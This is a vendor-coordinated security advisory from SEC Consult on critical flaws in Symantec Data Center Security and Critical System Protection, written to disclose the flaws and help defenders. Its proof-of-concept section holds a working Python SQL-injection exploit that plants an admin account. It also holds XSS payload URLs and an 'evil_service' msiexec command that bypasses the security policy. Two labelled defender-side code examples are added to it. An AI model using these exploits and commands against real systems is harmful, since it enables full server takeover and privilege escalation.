SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
title: Multiple critical vulnerabilities
products: Symantec Data Center Security: Server Advanced (SDCS:SA)
          Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
               vulnerabilities were fixed, but mitigations exist
impact: Critical
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
homepage: www.symantec.com
found: 2014-09-19
by: Stefan Viehböck
    SEC Consult Vulnerability Lab
=======================================================================
Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previously known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"
Source:
www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products
Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.
SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).
Furthermore the SDCS:SA Client protections can be bypassed in several ways.
It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.
Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.
No prior authentication is needed to exploit this vulnerability.
Affected script:
https://<host>:4443/sis-ui/authenticate
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The application suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver and version information (OS, Java).
Affected script:
https://<host>:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.
Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!
- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.
- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.
- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the system.
- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.
Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
The code used to exploit the SQL injection vulnerability is listed below:
import httplib
def send_request(host,data):
    params = data
    headers = {"AppFire-Format-Version": "1.0",
               "AppFire-Charset": "UTF-16LE",
               "Content-Type":"application/x-appfire",
               "User-Agent":"Java/1.7.0_45",
               }
    conn = httplib.HTTPSConnection(host)
    conn.request("POST", "/sis-ui/authenticate", params, headers)
    response = conn.getresponse()
    data=response.read()
    conn.close()
    return response,data
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
As the application users also act as Tomcat administrators, an attacker can
log in to the Tomcat manager as well. The Tomcat manager is available by
default via TCP port 8081 (HTTPS).
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.
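
Defender-side check for the request format used above, added here as an example
(not SEC Consult's or Symantec's code): it parses a captured
/sis-ui/authenticate body and flags properties that carry SQL metacharacters.
The framing is inferred only from the proof of concept, the function names are
hypothetical, and checking fields other than "un" goes beyond the case shown.

```python
import re

# Framing inferred only from the proof-of-concept request (assumption):
# ASCII header lines, blank line, UTF-16LE "key=value" body, EOF_FLAG trailer.
EOF_FLAG = b"\nEOF_FLAG\n"
# Sequences needed to leave a quoted SQL string and stack or comment out SQL.
SUSPICIOUS = re.compile(r"['\";]|--|/\*")

def parse_appfire(raw: bytes) -> dict:
    """Split a captured request body into its properties (hypothetical helper)."""
    head, sep, rest = raw.partition(b"\n\n")
    if not sep:
        raise ValueError("no header/body separator")
    meta = dict(l.split("=", 1) for l in head.decode("ascii").split("\n") if "=" in l)
    body = rest[:-len(EOF_FLAG)] if rest.endswith(EOF_FLAG) else rest
    if int(meta.get("Data-Length", "-1")) != len(body):
        raise ValueError("Data-Length does not match body size")
    props = {}
    for line in body.decode("utf-16le").split("\r\n"):
        key, eq, value = line.partition("=")
        if eq:
            props[key] = value
    return props

def flag_request(raw: bytes, fields=("un", "ha", "an", "hn", "av")) -> list:
    """Return (field, value) pairs whose value contains SQL metacharacters."""
    props = parse_appfire(raw)
    return [(f, props[f]) for f in fields if f in props and SUSPICIOUS.search(props[f])]

def build(props: dict) -> bytes:
    """Frame constructed sample properties the way the proof of concept does."""
    body = "\r\n".join(f"{k}={v}" for k, v in props.items()).encode("utf-16le")
    header = b"Data-Format=text/plain\nData-Type=properties\nData-Length=%d\n\n"
    return header % len(body) + body + EOF_FLAG

# Constructed samples, not captured traffic.
BENIGN = build({"ai": "2", "ha": "example.com", "un": "operator1", "pwd": "cGxhY2Vob2xkZXI="})
TAMPERED = build({"ai": "2", "ha": "example.com", "un": "operator1'; -- ", "pwd": "cGxhY2Vob2xkZXI="})

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, flag_request(raw))
```

A filter like this is a stopgap for a reverse proxy or for log review; binding
the value as a query parameter in the servlet is what removes the injection.
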
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URL discloses internal information:
https://example.com:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.
- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.
- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.
- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted (it runs with "safe privileges") when started as a
service (usually the "Windows Installer" service, parameter "/V"). This can be
abused by creating a service that starts msiexec.exe with the parameters
"/quiet", "/i" and a path to a valid .msi file. Upon service start the .msi
file is executed with "safe privileges" and is not subject to any SDCS:SA
Client checks.
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.
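
An audit for the two service-related policy assumptions described above, added
here as an example (not part of the advisory or of Symantec's policies): it
flags services whose binary does not end in ".exe" and services that start
msiexec.exe with an install switch. Function names and sample values are
constructed; real input would be each service's ImagePath value under
HKLM\SYSTEM\CurrentControlSet\Services\<name>.

```python
import ntpath
import re

# Unquoted ImagePath: shortest prefix ending in ".ext" before a space or the end.
# Unquoted paths containing spaces are ambiguous, so treat hits as leads to review.
_UNQUOTED = re.compile(r"^(.*?\.[A-Za-z0-9]{1,4})(?=\s|$)(.*)$")

def split_image_path(image_path: str):
    """Return (binary, arguments) from a service ImagePath string."""
    s = image_path.strip()
    if s.startswith('"'):
        binary, _, args = s[1:].partition('"')
        return binary, args.strip()
    m = _UNQUOTED.match(s)
    if m:
        return m.group(1), m.group(2).strip()
    binary, _, args = s.partition(" ")
    return binary, args.strip()

def audit_service(name: str, image_path: str) -> list:
    """Findings for one user-mode service (kernel drivers are out of scope)."""
    binary, args = split_image_path(image_path)
    ext = ntpath.splitext(binary)[1].lower()
    base = ntpath.basename(binary).lower()
    # Normalise "-i" to "/i" so both switch prefixes are compared alike.
    switches = {"/" + a[1:].lower() for a in args.split() if a[0] in "/-"}
    findings = []
    if ext != ".exe":
        findings.append(f"{name}: service binary {binary!r} does not end in .exe")
    if base == "msiexec.exe" and switches & {"/i", "/package"}:
        findings.append(f"{name}: msiexec.exe runs as a service with an install switch")
    return findings

# Constructed sample values; the third mirrors the command line shown above.
SERVICES = {
    "msiserver": r"C:\Windows\system32\msiexec.exe /V",
    "agent": r'"C:\Program Files\Vendor App\agent.exe" --service',
    "sample_msi": r"c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi",
    "sample_ext": r"C:\ProgramData\updater.dat -run",
}

if __name__ == "__main__":
    for svc, path in SERVICES.items():
        for finding in audit_service(svc, path):
            print(finding)
```
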
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.
Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:
More information can be found at:
www.symantec.com/security_response/securityupdates/detail.jsp
www.symantec.com/business/support/index
Workaround:
-----------
See solution.
Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
EOF Stefan Viehböck / @2015